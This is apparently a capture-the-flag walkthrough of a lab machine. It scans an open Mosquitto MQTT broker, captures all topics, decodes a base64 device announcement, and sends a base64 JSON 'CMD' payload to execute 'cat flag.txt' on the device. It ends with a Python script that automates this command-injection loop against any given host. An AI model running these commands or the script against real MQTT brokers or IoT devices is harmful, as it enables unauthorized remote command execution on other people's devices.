
Bugged VM

nmap

sudo nmap -p- 10.10.108.171 -vvvv -T4
sudo nmap -sC -sV -O -p1883 10.10.108.171

PORT     STATE SERVICE                  VERSION
1883/tcp open  mosquitto version 2.0.14
PORT     STATE SERVICE                  REASON         VERSION
1883/tcp open  mosquitto version 2.0.14 syn-ack ttl 60
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|     $SYS/broker/publish/bytes/sent: 1108
|     $SYS/broker/load/sockets/1min: 1.67
|     $SYS/broker/clients/connected: 2
|     $SYS/broker/messages/stored: 38
|     $SYS/broker/messages/received: 9063
|     $SYS/broker/load/publish/sent/15min: 2.52
|     $SYS/broker/load/bytes/sent/5min: 673.70
|     $SYS/broker/load/publish/sent/1min: 33.81
|     $SYS/broker/subscriptions/count: 5
|     $SYS/broker/clients/active: 2
|     $SYS/broker/clients/inactive: 1
|     $SYS/broker/publish/bytes/received: 308061
|     $SYS/broker/messages/sent: 9195
|     $SYS/broker/clients/disconnected: 1
|     $SYS/broker/load/bytes/sent/15min: 468.75
|     $SYS/broker/clients/total: 3
|     $SYS/broker/load/sockets/15min: 0.20
|     $SYS/broker/publish/messages/sent: 134
|     $SYS/broker/load/messages/received/1min: 93.65
|     $SYS/broker/load/messages/received/15min: 90.34
|     patio/lights: {"id":16405124934517910958,"color":"BLUE","status":"ON"}
|     storage/thermostat: {"id":1632603447202492969,"temperature":23.995878}
|     $SYS/broker/load/bytes/received/1min: 4335.15
|     kitchen/toaster: {"id":11835886495264240745,"in_use":true,"temperature":152.60582,"toast_time":242}
|     $SYS/broker/load/sockets/5min: 0.43
|     $SYS/broker/bytes/received: 431139
|     $SYS/broker/load/connections/5min: 0.44
|     $SYS/broker/retained messages/count: 38
|     frontdeck/camera: {"id":13258612146123966195,"yaxis":-46.27411,"xaxis":-28.1288,"zoom":2.6762495,"movement":true}
|     $SYS/broker/load/publish/sent/5min: 7.27
|     $SYS/broker/store/messages/count: 38
|     $SYS/broker/load/messages/sent/1min: 127.46
|     $SYS/broker/uptime: 6017 seconds
|     $SYS/broker/load/bytes/received/15min: 4278.39
|     $SYS/broker/load/messages/received/5min: 90.86
|     livingroom/speaker: {"id":12708993900896013872,"gain":44}
|     $SYS/broker/version: mosquitto version 2.0.14
|     $SYS/broker/load/bytes/sent/1min: 1818.23
|     $SYS/broker/clients/maximum: 3
|     $SYS/broker/load/connections/1min: 1.83
|     $SYS/broker/load/bytes/received/5min: 4280.56
|     $SYS/broker/load/messages/sent/5min: 98.12
|     $SYS/broker/bytes/sent: 42064
|     $SYS/broker/store/messages/bytes: 279
|     $SYS/broker/load/messages/sent/15min: 92.85
|_    $SYS/broker/load/connections/15min: 0.20

1883 - Pentesting MQTT

Mosquitto is an open-source message broker for the MQTT protocol: IoT devices (toasters included) publish messages to named topics on the broker, and any client subscribed to those topics receives them. We can talk to it with the Mosquitto command-line clients and subscribe to topics with mosquitto_sub.

With mosquitto_sub we can subscribe to any of the topics (-t) found in the service scan and print the messages published to them. Topics we don't care about can be filtered out with -T.

TLS-encrypted connections are recommended, since otherwise every message sent or received crosses the wire in plain text, including any username and password in the CONNECT packet.

Capturing our request in Wireshark we can see this broker isn't using a TLS-encrypted connection; 1883 is the plain MQTT port (8883 is the TLS one).

We can capture all messages on every topic by subscribing to the multi-level wildcard -t '#'. Note that '#' does not match topics beginning with '$', so the $SYS/ broker statistics nmap listed need a separate -t '$SYS/#' subscription.

mosquitto_sub -h 10.10.108.171 -p 1883 -t '#'
{"id":6476193693900882290,"color":"RED","status":"OFF"}
eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==
{"id":9254039711038327212,"gain":49}
┌──(oskar㉿kali)-[~/Scripts/mqtt/python-mqtt-client-shell]
└─$ echo "eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==" | base64 -d
{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","registered_commands":["HELP","CMD","SYS"],"pub_topic":"U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub","sub_topic":"XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub"}         

Decoded, this announcement gives us the device id, the commands it registers (HELP, CMD, SYS), the topic it publishes replies on (pub_topic) and the topic it listens on (sub_topic). We can open a listener on the pub topic with mosquitto_sub:

  1. mosquitto_sub -h 10.10.108.171 -p 1883 -t U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub
  2. Send a test message from another terminal with mosquitto_pub -h 10.10.108.171 -t XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub -m test and the listener should receive a response.
  3. We get another base64 string to decode that gives us what we need to continue: the JSON format the device expects. We can then encode our own payload with base64: echo '{"id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d", "cmd": "CMD", "arg": "cat flag.txt"}' | base64 (echo appends a newline, which is what the trailing K encodes; echo -n avoids it).
  4. and send it through to the sub topic to get our flag back on the listener, base64-encoded like everything else this device says: mosquitto_pub -h 10.10.108.171 -t XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub -m eyJpZCI6ICJjZGQxYjFjMC0xYzQwLTRiMGYtOGUyMi02MWIzNTc1NDhiN2QiLCAiY21kIjogIkNNRCIsICJhcmciOiAiY2F0IGZsYWcudHh0In0K
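The same discovery-and-command loop, automated, as an added example that is not part of the original writeup: it pulls the base64 announcement out of a wildcard capture, decodes it, builds the command payload without the stray newline, and drives mosquitto_sub/mosquitto_pub to send one command and collect the reply. The sample capture is the three lines printed above and the device id and topics are the ones from the page; the host and port default to the lab target, and capture/run_command are my own helper names, not anything the device or Mosquitto provides.

```python
"""Added example (not from the original writeup): automate the discovery-and-
command loop against a device that talks base64-wrapped JSON over MQTT."""
import base64
import json
import subprocess
import sys
from typing import Dict, List, Optional

# Constructed sample: the three messages the wildcard subscription printed above.
SAMPLE_CAPTURE = [
    '{"id":6476193693900882290,"color":"RED","status":"OFF"}',
    "eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==",
    '{"id":9254039711038327212,"gain":49}',
]


def decode_b64_json(blob: str) -> Optional[Dict]:
    """Return the JSON object hidden in a base64 string, or None when the text is
    not strict base64 or does not decode to a JSON object."""
    try:
        obj = json.loads(base64.b64decode(blob.strip(), validate=True))
    except ValueError:  # binascii.Error, UnicodeDecodeError, JSONDecodeError all subclass it
        return None
    return obj if isinstance(obj, dict) else None


def find_announcements(messages: List[str]) -> List[Dict]:
    """Pick out the messages that are base64-wrapped JSON carrying a pub/sub
    topic pair, i.e. the device announcement the page decodes by hand."""
    found = []
    for msg in messages:
        obj = decode_b64_json(msg)
        if obj and "pub_topic" in obj and "sub_topic" in obj:
            found.append(obj)
    return found


def build_command(device_id: str, cmd: str, arg: str) -> str:
    """Base64-encode the command JSON the device expects. json.dumps gives the
    same '{"id": ..., "cmd": ..., "arg": ...}' layout the page used, minus the
    trailing newline that `echo | base64` adds."""
    msg = json.dumps({"id": device_id, "cmd": cmd, "arg": arg})
    return base64.b64encode(msg.encode()).decode()


def capture(host: str, port: int, seconds: int = 10) -> List[str]:
    """Assumed helper: mirror `mosquitto_sub -t '#'` for a few seconds and return
    one line per payload (-W makes mosquitto_sub exit after the timeout)."""
    res = subprocess.run(
        ["mosquitto_sub", "-h", host, "-p", str(port), "-t", "#", "-W", str(seconds)],
        capture_output=True, text=True,
    )
    return res.stdout.splitlines()


def run_command(host: str, port: int, dev: Dict, cmd: str, arg: str, timeout: int = 5) -> Optional[str]:
    """Assumed helper: listen on the device's pub topic, publish one command to
    its sub topic and return the first reply, base64-decoded when possible.
    -C 1 makes mosquitto_sub exit after one message, -W bounds the wait."""
    sub = subprocess.Popen(
        ["mosquitto_sub", "-h", host, "-p", str(port), "-t", dev["pub_topic"],
         "-C", "1", "-W", str(timeout)],
        stdout=subprocess.PIPE, text=True,
    )
    subprocess.run(
        ["mosquitto_pub", "-h", host, "-p", str(port), "-t", dev["sub_topic"],
         "-m", build_command(dev["id"], cmd, arg)],
        check=True,
    )
    out, _ = sub.communicate(timeout=timeout + 2)
    reply = out.strip()
    if not reply:
        return None
    try:
        return base64.b64decode(reply, validate=True).decode()
    except ValueError:
        return reply  # device answered in the clear


if __name__ == "__main__":
    # Default to the lab target from the page; pass a host to capture live instead
    # of using the constructed sample.
    host = sys.argv[1] if len(sys.argv) > 1 else "10.10.108.171"
    messages = capture(host, 1883) if len(sys.argv) > 1 else SAMPLE_CAPTURE
    for dev in find_announcements(messages):
        print("device", dev["id"], "accepts", dev.get("registered_commands"))
        print(run_command(host, 1883, dev, "CMD", "cat flag.txt"))
```

The subscriber is started before the publish so the reply cannot race past an empty subscription; if the device stays silent, -W lets mosquitto_sub exit and run_command returns None instead of hanging.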
This post is licensed under CC BY 4.0 by the author.